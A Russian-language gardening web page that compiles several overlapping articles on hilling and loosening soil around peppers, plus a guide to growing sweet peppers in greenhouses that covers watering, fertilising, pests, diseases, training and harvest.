25 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Нужно ли окучивать перцы в теплице и открытом грунте

Процесс окучивания перца

Окучивание перца является одним из пунктов ухода за культурой. Существуют разные мнения насчет необходимости проведения этой процедуры.

Процесс окучивания перца

Описание процесса

Окучивание — это один из способов рыхления, после которого землю пригребают холмиком на основание стебля. Вспахивают только верхний слой почвы. Для многих огородных растений окучивание дает положительный результат. Это мероприятие благотворно влияет на корневую систему. Образуются новые корешки, вследствие чего культура становится более устойчивой и получает больше питания. Также растения имеют доступ к кислороду. В период сильных дождей слой грунта не вымывается.

Многие используют этот прием с целью профилактики болезней. Его полезно производить перед предстоящими заморозками или похолоданием. Это предупреждает вымерзание культуры.

Преимущества

Корневая система перца, так же, как и баклажанов, расположена в верхних слоях грунта — она является поверхностной. Если окучивать растения, можно добиться следующих результатов:

  • увеличивается доступ кислорода к корням;
  • активизируется рост и развитие культуры;
  • повышается биологическая функция содержащихся в почве микроорганизмов: они влияют на здоровье овощей, снижают риск развития патологий.

При окучивании всегда удаляют сорную траву, поэтому она не успевает навредить культуре.

Недостатки

При окучивании перца легко повредить его корни. Надо быть предельно осторожными, чтобы не задеть их. Также корневая система растения имеет шейку, поэтому оно не нуждается в развитии дополнительных корешков. Такая манипуляция способствует задержке влаги в почве. Растениям это грозит загниванием корней и ствола.

Когда производить окучивание

У такого растения придаточные корневые отпрыски образуются только на зеленом стебле. Процесс происходит до формирования семядольных листьев, поэтому эффективно окучивать в этот период: культура получает стимуляцию роста.

После высадки рассады не стоит производить окучивание

Не стоит производить этот агротехнический процесс, после того как стебель растения уже одеревенел. При отсыпке земли заглубляется корневая шейка. Овощи отрицательно реагируют на рыхление. Повышается риск повреждения корневой системы. Также не надо проводить окучивание после высадки рассады на постоянное место. Где-то до 2 недель культура приостанавливает развитие. В это время укрепляются корни.

Как окучивать

Если выбор сделан в пользу этой процедуры, ее совершают с предельной осторожностью. Чувствительная корневая система не должна быть затронута, иначе растение погибнет или сбросит завязи и цветки.

Рыхление производят мотыгой при образовании сухой корки, которую овощи не приемлют. Движения должны быть плавными. Перцы окучивают в 4 этапа:

  • спустя 1-2 сутки после второго полива землю заделывают на глубину менее 6-8 см;
  • во время цветения — не больше, чем на 10-12 см;
  • в период образования завязей — до 14-16 см;
  • когда начинается массовое плодоношение — на 6-8 см.

Глубину вспашки можно увеличить, если культуру выращивают на тяжелой земле. Таким действием добиваются прогревания и проветривания почвы.

Когда окучивают салатный перец, слегка рыхлят почву каждый раз после дождя. Во время совершения манипуляций удаляют сорняки. После нее мульчируют растения компостом или соломой.

Рыхление почвы при окучивании

Культура хорошо откликается на рыхление в междурядьях, независимо от того, где она выращивается: на незащищенном грунте или в теплицах. На протяжении вегетационного периода совершают до 5 таких процедур. Существуют определенные правила, которых надо придерживаться при вспашке земли:

  • глубина рыхления должна составлять 10-12 см во время цветения;
  • когда образуются завязи — не более 15 см;
  • в период плодоношения — до 20-25 см;
  • если расстояние между рядами небольшое, во время цветения землю не рыхлят.

Такие манипуляции помогают справляться также с сорной травой. Ее засыпают небольшим слоем почвы, под которым она гибнет. При выращивании культуры в тепличных условиях рыхление должно сопровождаться проветриваниями.

Можно ли окучивать перцы: как правильно это делать

Окучивание – вид обработки грунта с нагребанием рыхлой почвы из междурядий на стебли высотой 20-30, 150-200 мм. Перец – овощная растительная культура семейства Пасленовые, родом из американских тропиков. Чтобы понять, надо ли при выращивании его рыхлить, следует изучить биоособенности овоща. Необходимо обратить внимание на свойства почвы на участке или в тепличном помещении. Важно, чтобы земля пропускала воздух и воду к корневищу.

Польза окучивания

Окучивание может быть мелким и высоким. Главное звено в процессе – взрыхление корки и разрушение капилляров в ней, чтобы не допустить потерю влаги. Окучивать рассаду многие предпочитают из-за того, что такая мера:
  • защищает корни от негативного воздействия солнца;
  • способствует нарастанию новых корней у растений с поверхностным корневищем.

Окучивание стимулирует формирование свежих корешков, которые затем будут доставать для растительной культуры воду и полезные микроэлементы. В особенности полезна процедура для болгарского перца, выращиваемого на огороде, под открытым небом.

Возможные риски

Окучивание перца в теплице или в открытом грунте несет с собой определенные риски. Обрабатывая взрослую рассаду, огородник может повредить разросшиеся корни культуры инструментом. Закрывание почвой прикорневой шейки перца, чрезмерное поливание в парнике может спровоцировать гниение. Проблемы получится предотвратить, если соблюдать время и правила окучивания рассады. Советы профессионалов помогут увеличить количество урожая без вреда для ее стойкости к специфическим болезням.

Несмотря на все плюсы обработки, среди огородников нет точного ответа на вопрос, нужно ли окучивать перец. Дачники делятся на 2 лагеря:

  • одни считают, что перцовую рассаду окучивать не нужно;
  • другие не сомневаются в необходимости мероприятия.

Каждое мнение подкреплено аргументы, дающими возможность сделать вывод о том, в какой ситуации необходимо окучивать, а когда от обработки надо отказаться.

Определенная часть огородников утверждает, что окучивать – никчемная затея. Это связано с тем, что корневище располагается близко к поверхности грунта, в результате чего во время взрыхления ее легко можно травмировать. Еще один аргумент против: корни рассады имеют шейку, разрастание дополнительных корешков для выполнения питательной и фиксирующей рассаду в грунте функции болгарским перцам не нужно.

Но все очень, относительно. Вторая часть овощеводов убедилась на практике, что перец позитивно откликается на рыхление, поэтому они проводят такую уходовую процедуру регулярно. Это объясняется тем, что благодаря корням, расположенным близко к поверхности, во время взрыхления идет приток кислородных масс. Такое насыщение:

  • запускает рост и развитие рассады;
  • усиливает биологический функционал почвенных полезных микроорганизмов;
  • улучшает питание.

Технология окучивания

Болгарские перцы абсолютно не терпят корки на грунте, поэтому огородник должен следить за ее формированием и своевременно ликвидировать сухость. Однако окучивание перцев надо проводить очень осторожно, чтобы не задеть корешки. Для этого важно соблюдать технологию рыхления:

  1. Одна из особенностей перца – медленный рост в первые полторы-две недели после пересаживания. Что связано с укреплением корня. В это время выполнять рыхление противопоказано.
  2. Первый раз окучивать можно через сутки-двое после второго полива. Глубина взрыхления не должна быть больше 60-80 мм.
  3. В период массового цвета нужно выполнить еще одно окучивание. Рыхлить разрешается на глубину 80-100 мм.
  4. Третий раз окучивают во время формирования завязей перцев. Можно рыхлить на глубины 140-160 мм.
  5. В фазу массового плодоношения окучивать можно на глубину 60-80 мм. Если почва отличается тяжелой структурой, рыхлить нужно чуть глубже, чтобы обеспечить полноценный нагрев и проветривание грунта. Но делать это необходимо очень осторожно, чтобы не нанести вред корневой системе.

Кроме указанных случаев, поверхностное окучивание следует выполнять после каждого полива или природных осадков. В период обработки необходимо убирать сорную траву. Рассаду в теплице или на огороде можно окучивать только после формирования 4–5 настоящих листиков. После такого обрабатывания землю важно мульчировать компостом, укрыть соломой или другими материалами. При выращивании перцевой рассады на огороде рыхлить нужно и в междурядьях. Чтобы не навредить рассаде, важно соблюдать ряд рекомендаций:
  1. Междурядные окучивания в период массового цвета осуществляют на глубине 100-120 мм.
  2. Во время образования завязей окучивают на глубине 150 мм.
  3. В период массового плодоношения обрабатывают на глубине 220-250 мм.

Когда между рядами узко, не обрабатывают при массовом цветении. Широкие дорожки между рядами нельзя рыхлить после того, как перец достигнет высоты навески обрабатывающих мини-машин или тракторов современных моделей. В период вегетации необходимо 2-3 раза окучить растительную культуру с целью удаления сорной травы.

Для перцевой рассады окучивание выполняют в начале вегетационного периода – приблизительно через 14 дней после высаживания саженцев в открытый грунт. За это время она пустит крепкие корни.

При рыхлении правильно применять мотыгу на длинной ручке. Это даст возможность брать грунт с дальних концов огорода и соседних междурядий. Землю окучивают на глубину 60-80 мм и нагребают на стебли валиком, высотой не больше 40 мм. Если кусты высажены не часто – можно нагрести почву вокруг каждого растения отдельно. Сорную траву следует убирать и по возможности не прикапывать.

Если огородник выбирает окучивание, его проводят с предельной аккуратностью. Чувствительные корни не должны быть задеты, иначе перец погибнет или облетит. Окучивают специальным инструментом при формировании сухой корочки, которую перец не любит. Рыхлить надо плавно и поэтапно:

  1. Спустя 2 дня после второго полива почву заделывают на глубину меньше 60-80 мм.
  2. При цветении — не более, чем на 100-120 мм.
  3. Во время формирования завязей — до 140-160 мм.
  4. Когда формируются стручки — на 60-80 мм.

Когда рыхлят болгарский перец, слегка поднимают грунт каждый раз после дождя. Сразу убирают и сорную траву. После окучивания вносят мульчу.

Надо ли окучивать перцы в открытом грунте и теплице

Чтобы понять, нуждаются ли рассада в рыхлении, необходимо хорошо изучить субстрат на огороде и внимательно подойти к подготовке участка для высадки полезной овощной культуры. Тяжелый глинистый следует разбавить внесением песка, а в легкий включить глины. Во всех случаях обязательно добавления торфа, большого числа органических веществ в виде компостной массы или перегноя. Так, на 1 м² грядки разбрасывают 20-30 кг перегноя. Позитивный эффект от выполнения рыхления состоит в следующем:
  1. В грунте сохраняется влага.
  2. Повышается поступление кислорода к корневищу.
  3. Заодно убирают сорняки.
  4. При внесении минералов и органики осуществляют их заделку.
  5. Активизируют полезные микроорганизмы.
  6. Во время возвратных весенних морозов корневище будет под защитой от повреждения.
  7. В ситуации сильного ветра рассада выстоит в грунте. Огород, на котором окучивают перец, выглядит более ухоженным, с высокой агротехнической культурой.

Перец в теплице окучивать необязательно. Это связано с тем, что новые корни у высаженных культур не образуются, а именно это — основная задача рыхления. Однако так как перцы не переносят формирования корки на грунте, его важно взрыхлять на малую глубину. Такая мера станет профилактической, защитит от многих болезней, обогатит корни растительной культуры кислородом и исключит загнивание. Процедуру взрыхления грунта в теплице правильно совмещать с проветриванием.

Как ухаживать за посадками после окучивания

Во время начала вызревания перцев – нужно продолжать поливание в требуемом объеме, так как болгарский любит влагу. На каждый м² грядки нужно проливать 40-50 л воды. После поливания полезна торфяная мульча. Перец отзывчив на листовые удобрения простыми или комплексными составами. Чрезмерное увлечение органикой, например, подкормка птичьим пометом приводит к тому, что рассада наращивает зелень, в ущерб плодоношению. При выращивании высокорослых сортовых видов важно проводить подвязку к колышкам. Если налицо загущение, оставляют 2-3 стебля.

Процедура позитивно сказывается на многих растениях. Если по правилам окучивать перец, это приведет к активному росту и хорошему питанию овоща. Совмещая действие с другими уходовыми мероприятиями, можно собрать богатый урожай.

Можно ли окучивать перцы и как правильно это делать

Окучивание – это рыхление верхнего слоя почвы вокруг растения с нагребанием земли на стебли на высоту от 2 до 20 см. Это увеличивает доступ кислорода к корням, что положительно сказывается на росте корневой системы, а значит и всего растения. Невозможно представить, что какая-нибудь культура обходилась без окучивания, но в отношении перца у огородников мнения расходятся.

Нужно ли окучивать перец

Есть мнение, что окучивать перец нельзя. Корни растения находятся у поверхности земли и их можно легко повредить, тем самым погубив куст. Другие специалисты настаивают, что эта процедура необходима для снабжения корней кислородом. Это способствует росту новых корневых побегов, необходимых для питания и нормального развития.

Процедура помогает отращивать новые корни культурам с поверхностной корневой системой. И болгарский перец, по мнению многих, нуждается в этом. Вовремя проведенное окучивание перцев стимулирует развитие корневой системы, которая, будет эффективно кормить и поить куст.

  • ливни могут размывать землю вокруг растения и оголять корень;
  • в засушливую погоду образовывается земляная корка, которая препятствует доступу кислорода.

Окучивание полезно, тем что:

  • в почве поддерживается влажность;
  • одновременно удаляются сорняки;
  • лучше заделывается внесенная подкормка из удобрений;
  • способствует развитию необходимых почвенных микроорганизмов.

Но, окучивая перец, можно не рассчитать глубину рыхления и повредить корни, что приведет к гибели куста. Также, по мнению многих садоводов, если закрыть корневую шейку в тепличных условиях можно спровоцировать развитие гнили.

Технология окучивания

Окучивание перца необходимо, но вместе с этим несет определенные риски, поэтому процедуру нужно проводить аккуратно, не повреждая корни. И рекомендуют соблюдать следующую технологию:

  1. Не стоит производить окучивание в первые 2 недели после высадки, так как в это время корень укрепляется в земле.
  2. В первый раз окучивание проводят после второго полива через 1-2 суток. Рекомендуют рыхлить неглубоко, на глубину 5 см.
  3. Второе рыхление делают во время начала цветения, которое можно углубить до 10 см в глубину.
  4. В третий раз окучивают, когда кусты перца обильно цветут. Делать это можно глубже на уровень 8-10 см.
  5. Когда появились завязи плодов проводят еще одну процедуру до глубины 14-16 см.
  6. Когда перцовый куст начинает плодоносить глубину рыхления сокращают до 6-8 см.

После каждого полива и дождя необходимо неглубоко рыхлить почву и одновременно удалять сорняки. Многие огородники считают, что когда стебель перца одеревенел, то окучивание не имеет смысла.

При окучивании пользуются тяпкой, мотыгой или сапом с длинной ручкой, чтобы доставать почву с дальних концов грядки и ближайших междурядий. Процедуру проводят через 12 часов после полива. Рыхлить на глубину до 10 см и нагребать землю на стебли валиком не более 4 см.

Садоводы, отстаивающие позицию «за» окучивание перца в теплице и на открытых грядах, утверждают, что без этой технологии невозможно получить хороший урожай. Окученный куст перца:

  • получает доступ кислорода к корням, что положительно сказывается на росте и плодоношении;
  • улучшается симбиоз растения с микроорганизмами, обитающими в грунте.

Противники окучивания отстаивают свою позицию, тем что корневую систему можно повредить. Второй их аргумент, что у перца есть корневая шейка, от которой отрастают боковые корневые побеги и этого достаточно, чтобы стимулировать рост и плодоношение кустов.

Надо ли окучивать перцы в теплице

Открытый грунт отличается от тепличного. Перец в теплицах сажают в субстрат, приготовленный по своей технологии, где много органики и мульчи. И такая смесь хорошо пропускает воздух и воду. Некоторые огородники утверждают, что у растений, в таких условиях, не образуются новые корешки, для чего, в основном и проводится окучивание. Поэтому многие считают окучивать перец в теплицах не нужно.

Но, есть считающие, что рыхлить землю на небольшую глубину, нужно, так как это:

  • предупреждает многие заболевания;
  • насыщает землю кислородом.

Хорошо если теплица при этом и проветривается.

После окучивания перцев следует придерживаться обычного графика ухода за растением. Нужно следить за режимом полива и подкормки. Если стоит жаркая и сухая погода, то поливать нужно чаще. Если дождливо, то приостанавливают. В любом случае перец – влаголюбивая культура и нужно следить за тем как увлажнена почва. При умеренной погоде возможен следующий режим орошения:

  • до цветения 1 раз в неделю;
  • во время цветения и плодоношения 2-3 раза в неделю.

В итоге можно выделить пару главных мыслей:

  • не нужно рыхлить глубоко, чтобы не повредить корень;
  • не закрывать шейку корня;
  • соблюдать режим полива и подкормки.

Советы могут быть противоречащими, однако это не говорит о том, что информация неверная. Существуют разные климатические условия, они отличаются от самых холодных до теплых и очень жарких. Каждое мнение основано на своем опыте, на своей почве, в своем климате.

Решив заняться разведением болгарского перца, лучше проконсультироваться с бывалыми садоводами в вашей местности, изучить их опыт, посмотреть на плоды их труда. Кроме того, нет лучше советчика чем собственный опыт. Можно высадить несколько грядок и обрабатывать их по-разному, наблюдая за результатом. Достаточно поэкспериментировать пару лет, чтобы наработать свою технологию выращивания перца. И кто знает, может она станет лучшей.

Особенности выращивания сладкого перца в теплице

Добавление статьи в новую подборку

Выращивание сладкого перца в тепличных условиях – гарантия того, что вы получите урожай. Только вот будет ли он богатым? Обязательно! Если обеспечить растениям правильный уход.

Перец – теплолюбивая культура, завезенная к нам из Америки в XVII-XVIII веках. Однако прижился он у нас не сразу: все-таки климат на большей территории страны не отличается мягкостью. Выход был найден очень быстро: сладкий перец стали выращивать в закрытом грунте.

Важно понимать, что далеко не все советы по выращиванию перца в открытом грунте подходят для тепличных условий. Например, нужно учитывать особую схему полива, не забывать о пасынковании, подвязке и других моментах.

Перец можно выращивать в пленочных, поликарбонатных и стеклянных теплицах.

Мы подробно расскажем об особенностях выращивания перца в теплице, чтобы вы смогли собрать хороший урожай без проблем.

Сладкий перец – требовательная культура

Ваша задача – поддерживать в теплице идеальный микроклимат.

Перец содержит большое количество витаминов – С, В1, В2, В9, Р, РР; в нем также есть калий, натрий и рутин

Перец довольно требователен к следующим факторам:

  • Температура воздуха. Оптимальная – 23-26°С.
  • Влажность воздуха. Перцу будет комфортно при влажности около 70-75%. Колебания влажности губительны: цветы и завязь опадают, плоды мельчают.
  • Освещенность. Перец не любит тень. Если растение не получит нужное количество света, протест оно будет «выражать» медленным ростом и слабой завязью. Поэтому не высаживайте перцы слишком густо.
  • Плодородие почвы. Эта культура растет очень хорошо на легких нейтральных почвах, обогащенных органикой. А вот тяжелый глинистый грунт явно не для нее.

Перцы, как и томаты, нуждаются в подвязке. Перед высадкой рассады подготовьте шпалеру – там, где будете высаживать перец, на высоте около 2 м натяните проволоку. В последующем к ней нужно будет прикрепить веревки для подвязки кустов.

Полив перца в теплице и мульчирование

Поливайте растения раз в 5 дней из расчета 1 л воды на одно молодое растение и 2 л – на взрослое. Идеальное время – утро (с 9 до 11 часов). Используйте дождевую или отстоявшуюся теплую водопроводную воду (можно наливать воду в большие черные баки – там она отстоится и нагреется).

Поливайте перец только под корень (можно применять капельный полив). Не допускайте попадания воды на листья. После каждого полива обязательно проветривайте теплицу. А через день проведите рыхление почвы, параллельно пропалывая растения.

Солома – один из самых популярных и доступных материалов для мульчирования

Чтобы почва в теплице не перегревалась и испаряла меньше влаги, ее можно замульчировать 3-4-сантиметровым слоем опилок, соломы, компоста или перегноя. Но это далеко не единственное предназначение мульчи.

Мульчирование имеет множество достоинств:

  • земля всегда остается рыхлой;
  • корни получают достаточное количество кислорода;
  • медленней растут сорняки.

Кстати, проветривать теплицу важно каждый день. Не нужно создавать сквозняков – достаточно открывать форточки или дверцы с одной стороны. Если на улице стоит нестерпимая жара, днем снимайте пленку с одной стороны теплицы.

Подкормка сладкого перца

Перец крайне нуждается в минеральных подкормках, поэтому 1-2 раза в месяц подкармливайте кусты комплексными минеральными удобрениями (15-20 г хлористого калия, 40 г суперфосфата и 20 г аммиачной селитры на10 л воды), совмещая подкормку с очередным поливом.

Первый раз внесите удобрения через 2 недели после высадки рассады.

Удобрения можно вносить спустя 2 недели после посадки, совмещая с поливом и рыхлением

Периодически можно заменять минеральные удобрения органикой, которая также очень полезна для растений. Разбавьте перепревший навоз водой (3:1). Настаивайте в теплице 3 дня. Затем разведите полученный настой водой (1:10). Вносите по литру удобрения под каждый куст.

Вредители и болезни перца в теплице

В условиях закрытого грунта формируется благоприятная среда для вольготной жизни многих вредителей. Вот самые частые гости теплиц с перцами.

Тля – мелкое зеленое насекомое

Оранжерейная белокрылка – насекомое с белыми крыльями

Красный паутинный клещ

Проволочник – личинка жука-щелкуна желтого цвета и с твердым покровом

Слизни

Вредитель Чем опасен? Меры борьбы
Высасывает из перца все соки. Это приводит к скручиванию листьев, усыханию завязи, порче плодов. Регулярно проветривайте теплицы. Обрабатывайте растения отварами полыни или тысячелистника.
Опрыскивайте их Фосбецидом.
Личинки насекомого питаются соками растения. Это приводит к увяданию листьев. Насекомое провоцирует распространение опасных грибковых заболеваний. В период вегетации опрыскивайте растения Фосбецидом.
Обитая на внутренней стороне листьев, это насекомое уничтожает растение. Сначала на листьях возникают желтые пятна, которые потом становятся грязно-желтыми. Со временем появляется паутина. Обрабатывайте растения следующими препаратами: Актеллик, Карбофос, Фосбецид, Фуфанон.
Личинки обитают в почве, нанося ущерб корням перца. В итоге растение растет и развивается очень медленно. Для охоты на проволочников используйте приманки: нарежьте сырой клубень картофеля на небольшие кусочки, воткните в них деревянные шпажки и углубите приманки в землю на 5-7 см. Через несколько дней достаньте их вместе с личинками и уничтожьте.
Насекомое с удовольствием лакомится листьями и плодами перца, которые в скором времени загнивают. Вокруг грядки сделайте небольшие бороздки и опрыскайте их известковым раствором. Проведите рыхление почвы и посыпьте ее горчичным порошком. Можно использовать препарат Стрела.

Теперь поговорим о самых распространенных болезнях тепличных перцев.

Мозаика

Растения, больные мозаикой, без сожаления уничтожайте.

Для посева используйте только здоровый семенной материал. Для обеззараживания обработайте семена 2% раствором гидроксида натрия. Уничтожайте паутинного клеща, тлю, которые являются переносчиками мозаики.

Бактериальный рак

Удалите все пораженные кусты. Здоровые растения обработайте медным купоросом.

После уборки урожая перцев продезенфицируйте теплицу бромистым метилом или полностью замените грунт.

Белая гниль

Фузариоз

Болезнь Описание Меры профилактики и борьбы
Пораженные листья сморщиваются, на них появляются белые пятна, на плодах мозаичные пятна приобретают желтый оттенок. Пораженные листья начинают увядать с одной стороны. Затем на черешках и стеблях появляются бурые полосы со слизью, листья желтеют. На плодах могут образовываться пятна с темным центром. Сначала увядает верхушка растения, затем часть стебля становится очень мягкой, покрывается белым налетом. Если разрезать стебель, можно увидеть черные склероции. Для предотвращения распространения болезни, обработайте пораженные растения любым медьсодержащим препаратом. Следите за тем, чтобы посадке не были слишком загущены – это нарушает вентиляцию. Не перебарщивайте с азотными удобрениями, ведь их избыток провоцирует распространение заболевания.
Сеянцы растут медленно.
Верхние листья желтеют, часть плода возле плодоножки темнеет и засыхает.
Больное растение выкопайте и сожгите. Профилактические меры: обработайте семена перед посевом Фундазолом (0, 1 г препарата на 10 г семян).

Подвязка и формировка

Урожайность перцев во многом зависит именно от своевременной подвязки, формировки и пасынкования.

Заранее подготовленную шпалеру уже через неделю после высадки рассады можно использовать по назначению. Подвяжите растения к шпалере, используя шпагат: сделайте свободную петлю в нижней части растения, обкрутите стебель. По мере роста побегов обкручивайте шпагатом самые сильные из них. Остальные подвязывайте вкруговую несколько раз за сезон.

Теперь поговорим о формировке – что это такое и для чего она нужна? Дело в том, что после образования первого бутона (он удаляется) растение активно разветвляется: можно наблюдать образование нескольких побегов, которые в свою очередь тоже ветвятся. В итоге растение испытывает дефицит света, который, как отмечалось выше, перцу вреден.

Формировка поможет не допустить чрезмерного загущения растений. Когда разветвится основной стебель, оставьте 2 сильных побега, а остальные – прищипните (после образования первого плода). Не помешает и удаление боковых побегов (на верхней части растения), на которых нет завязей плодов, а также боковых побегов на нижней части.

От пасынков нужно обязательно избавляться, чтобы они не мешали развитию растения

Рядом с боковыми побегами, из пазух листьев часто вырастают дополнительные побеги – пасынки. Пасынкование проводите, пока длина побегов не превысила 10 см. В жаркую погоду пасынки образуются наиболее активно, поэтому их придется удалять регулярно.

В утренние часы периодически встряхивайте шпалеру, чтобы «расшевелить» растения – это способствует образованию завязей. Все манипуляции проводите максимально аккуратно: перец считается хрупким растением, и его легко сломать.

Сбор урожая сладкого перца

Сбор урожая – самое приятное занятие и, кажется, совсем несложное. Но и тут есть свои правила.

Существует две стадии зрелости перца:

  • Техническая – наступает через 45 дней после цветения; плоды достигают максимального размера, но при этом остаются зелеными. Перец можно употреблять в пищу, но плоды не отличаются сочностью и деликатесным вкусом.
  • Биологическая – плоды не только достигли положенного размера, приобрели яркую окраску, но и семена внутри них хорошо вызрели.

Снимайте урожай по мере созревания плодов, с начала июля вплоть до сентября. Обрывать перцы ни в коем случае нельзя: их нужно обрезать секатором вместе с плодоножкой.

Перец, собранный в стадии биологической спелости, наиболее вкусный и сочный

Плохо вызревшие перцы смело отправляйте на дозревание в холодильник – храните их в открытом полиэтиленовом пакете в течение месяца. Кусты выкорчевывайте сразу после того, как снимете с них последний плод.

Распоряжайтесь урожаем на свое усмотрение: употребляйте перец свежим, фаршируйте или заготавливайте на зиму. Приятного аппетита!

Как правильно окучивать перцы в открытом грунте и теплице и нужно ли это делать

Перец – овощное растение семейства Пасленовые, родом из тропических районов Америки. Чтобы понять, нужно ли при выращивании окучивать перцы, следует изучить биологические особенности культуры. Также важно принимать во внимание свойства грунта на участке или в теплице. Важно, чтобы грунт пропускал воздух и поливную воду к корням. Итак, разберемся последовательно по каждому пункту.

Что представляет собой процедура

Окучивание – вид обработки почвы с нагребанием мягкой взрыхленной земли из междурядий на стебли растений слоем от 2-3 до 15-20 сантиметров. В связи с этим, различают мелкое и высокое окучивание. Главным звеном в процедуре является рыхление почвенной корки и разрушение капилляров в ней, чтобы предотвратить потерю влаги.

Растения положительно отзываются на рыхление. Мелкое окучивание показано на легких песчаных почвах, для всех культур без исключения. На тяжелых суглинках и глинистых почвах, солонцах и солончаках даже небольшое окучивание может серьезно сдерживать рост растений.

Современные технологии возделывания овощей с применением систем капельного орошения основываются на мульчировании верхнего слоя почвы темной полиэтиленовой пленкой.

При этом растения развиваются быстрее, влага не испаряется. Такую технологию можно применять как на больших площадях – в поле, так и на огороде, в приусадебном хозяйстве.

Надо ли окучивать перцы в открытом грунте?

На родине, в Южной Америке, перцы – это многолетние полукустарники с одревесневшим стеблем. Корневая система у этой культуры мочковатая, поверхностно расположенная. В природе она не развивается до значительных размеров, поскольку грунт в местах ее естественного расселения очень плодородный и всегда влажный.

Важно! Корни у перца располагаются близко к поверхности почвы, а стебель становится очень плотным, на нем не образуются придаточные корни.

Чтобы ответить на вопрос, нуждаются ли болгарские перцы в окучивании, нужно внимательно рассмотреть почву на участке и с особой тщательностью подойти к подготовке грядок для посадки полезного овоща. Тяжелый глинистый грунт разбавляют внесением песка, а в легкий добавляют глину. Во всех случаях обязательно внесение торфа, большого количества органики в виде компоста или перегноя. Так, на 1 квадратный метр грядки вносят 20-30 килограммов перегноя.

Польза окучивания перцев

Положительный эффект от проведения окучивания заключается в следующем:

  • в почве сохраняется влага;
  • увеличивается поступление кислорода к корням;
  • одновременно удаляются сорняки;
  • при внесении минеральных и органических удобрений выполняется их заделка;
  • активизируются полезные почвенные микроорганизмы;
  • в период возвратных весенних заморозков корни более защищены от повреждения;
  • в случае ураганного ветра растения будут устойчивы в почве.

Участок, на котором применяют рыхление и окучивание, выглядит более ухоженным, с высокой культурой агротехники.

Какой вред может нанести процедура

У перцев в наличии четкое разграничение между тканями корня и стебля. Его можно заметить по тонкому сочленению – это, так называемая, корневая шейка. У молодых растений, при нахождении корневой шейки в земле, наблюдается угнетение или полная остановка роста, при этом возможно загнивание корней, развитие заболеваний.

В момент пикировки или высадки рассады шейка должна находиться на уровне почвы или чуть выше.

Во все периоды роста при окучивании легко можно повредить поверхностные корни или даже подрубить стебли кустов при их частом расположении. Сложно проводить окучивания при узких междурядьях. Могут страдать другие культуры, более нуждающиеся в присыпании грунта, например, картофель, томаты, бахчевые культуры.

Если участок заражен сорными растениями, и их семена повсюду рассыпаются, окучивание провоцирует прорастание сорняков, и ситуация с засоренностью грядок усугубляется. При закапывании корнеотпрысковых сорняков они размножаются в геометрической прогрессии.

Обратите внимание! Окучивание молодых ростков может привести к остановке роста, гнили и механическому повреждению корней, стеблей, сильному засорению гряд.

Необходимость процедуры в теплицах

Для тепличных перцев грунт готовят особым образом: добавляют много органики, удобрений и мульчи. Субстрат выровнен по физико-механическим свойствам – он хорошо пропускает воду, воздух, удерживает тепло. В период роста и максимальной продуктивности растения получают достаточно влаги и питательных веществ. Они надежно защищены от капризов погоды – мороза и сильного ветра. В таких условиях в окучивании нет необходимости.

Технология окучивания

Операция проводится вручную или с использованием технических средств – мотокультиваторов, мини-тракторов, а на полях – тракторными агрегатами, в сцепке с культиваторными механизмами. Важным условием успешного проведения окучивания является достаточная ширина междурядья – 40-70 сантиметров.

Оптимальные сроки

Для перцев процедуру проводят в начальный период вегетации – примерно через 2 недели после высадки рассады в открытый грунт. За это время она успевает укорениться. Окучивание в более поздние сроки не приносит желаемого положительного эффекта, поскольку стебель становится деревянистым.

Правила проведения работ

При ручном окучивании желательно пользоваться мотыгой с длинным черенком. Это позволит брать почву с дальних концов грядки и соседних междурядий. Почва рыхлится на глубину 6-8 сантиметров и нагребается на стебли валиком, высотой не более 4 сантиметров. Если кусты посажены редко – можно нагрести грунт вокруг каждого стебля в отдельности. Сорняки следует убирать и по возможности избегать их закапывания.

Как ухаживать за посадками после окучивания

В период вступления растений в плодоношение главное – это продолжать их поливать в достаточном объеме, поскольку перец любит влагу. Так, на каждый квадратный метр грядки необходимо выливать 4-5 ведер воды. После полива полезно мульчирование торфом.

Перец отзывчив на листовые подкормки простыми или комплексными удобрениями. Чрезмерное увлечение органикой, например, полив куриным пометом приводит к тому, что кусты начинают жировать в ущерб плодоношению. При выращивании высокорослых сортов кусты подвязывают к кольям. Если налицо загущение, количество стеблей нормируют до двух-трех.

При выращивании перцев следует внимательно рассмотреть почвенные условия, учесть биологические особенности культуры, возможность погодных аномалий и принять решение в отношении проведения процедуры окучивания. В целом, положительных эффектов от проведения этой операции больше, чем возможных негативных последствий.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
